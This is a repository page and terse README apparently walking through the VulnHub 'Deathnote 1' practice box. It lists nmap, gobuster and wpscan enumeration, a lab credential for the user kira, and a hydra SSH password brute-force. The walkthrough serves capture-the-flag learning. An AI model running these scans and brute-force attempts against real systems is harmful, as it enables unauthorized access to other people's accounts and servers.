https://github.com/gheris-579/deathnote-1-vulnhub
Level - easy Description : don't waste too much time thinking outside the box . It is a Straight forward box . This works better with VirtualBox rather than VMware
https://github.com/gheris-579/deathnote-1-vulnhub
2024 fyp gobuster hacking kali-linux kali-tools netdi vulnerability vulnhub vulnhub-walkthrough vulnhub-writeups wpscan-vulnerability-database
Last synced: about 2 months ago
JSON representation
Level - easy Description : don't waste too much time thinking outside the box . It is a Straight forward box . This works better with VirtualBox rather than VMware
- Host: GitHub
- URL: https://github.com/gheris-579/deathnote-1-vulnhub
- Owner: Gheris-579
- Created: 2024-03-09T11:17:29.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2024-03-23T21:20:53.000Z (about 1 year ago)
- Last Synced: 2025-01-30T09:17:09.078Z (4 months ago)
- Topics: 2024, fyp, gobuster, hacking, kali-linux, kali-tools, netdi, vulnerability, vulnhub, vulnhub-walkthrough, vulnhub-writeups, wpscan-vulnerability-database
- Homepage:
- Size: 8.79 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# DEATHNOTE-1-VulnHub
Level - easy Description : don't waste too much time thinking outside the box . It is a Straight forward box . This works better with VirtualBox rather than VMwarenetdiscover -i eth0

nmap -sS -sV -sC -p- ip
- The -sS option in nmap tells you to perform a stealth scan, that is, a scan in which the software tries not to be detected by the target host.
- The -sV option in nmap tells you to perform a version scan, that is, to try to identify the versions of services that respond to open ports.
- The -sC option in nmap tells you to run a scan script, that is, to use a set of predefined scripts to search for vulnerabilities or other information about running services.

nano /etc/hosts



this page was created with WordPress.

gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/Discovery/Web-Content/directory-list-2.3-medium.txt


wpscan --url http://deathnote.vuln/wordpress/ -e u

Password

User:kira pass:iamjustic3


hydra -l l -P note ssh://192.168.56.103
- l in username


https://www.dcode.fr/brainfuck-language





https://cyberchef.org/






